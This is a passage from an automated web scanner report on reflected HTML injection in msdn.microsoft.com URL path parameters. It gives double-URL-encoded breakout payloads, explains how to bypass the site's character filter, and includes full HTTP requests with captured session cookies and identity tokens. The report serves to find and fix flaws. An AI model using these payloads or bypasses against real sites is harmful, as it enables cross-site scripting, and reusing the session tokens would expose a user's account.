This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryf98e4%2522%253e%253ca%253eb5a34807f69/bb871519.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf98e4"><a>b5a34807f69/bb871519" />
...[SNIP]...

2.36. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871519.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54530%2522%253e%253ca%253e0117325841e was submitted in the REST URL parameter 3. This input was echoed as 54530"><a>0117325841e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb871519.aspx54530%2522%253e%253ca%253e0117325841e HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871519.aspx54530"><a>0117325841e" />
...[SNIP]...

2.37. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc295789.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c4c%2522%253e%253ca%253eee87a223ebb was submitted in the REST URL parameter 1. This input was echoed as 61c4c"><a>ee87a223ebb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us61c4c%2522%253e%253ca%253eee87a223ebb/library/cc295789.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us61c4c"><a>ee87a223ebb/library/cc295789" />
...[SNIP]...

2.38. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc295789.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a01%2522%253e%253ca%253ede0d876fda0 was submitted in the REST URL parameter 2. This input was echoed as 44a01"><a>de0d876fda0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library44a01%2522%253e%253ca%253ede0d876fda0/cc295789.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library44a01"><a>de0d876fda0/cc295789" />
...[SNIP]...

2.39. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc295789.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e327%2522%253e%253ca%253e398a6fe2bd2 was submitted in the REST URL parameter 3. This input was echoed as 9e327"><a>398a6fe2bd2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/cc295789.aspx9e327%2522%253e%253ca%253e398a6fe2bd2 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/cc295789.aspx9e327"><a>398a6fe2bd2" />
...[SNIP]...

2.40. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fbf%2522%253e%253ca%253e18d7c0c0b34 was submitted in the REST URL parameter 1. This input was echoed as 56fbf"><a>18d7c0c0b34 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us56fbf%2522%253e%253ca%253e18d7c0c0b34/library/dd208104(PROT.10 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
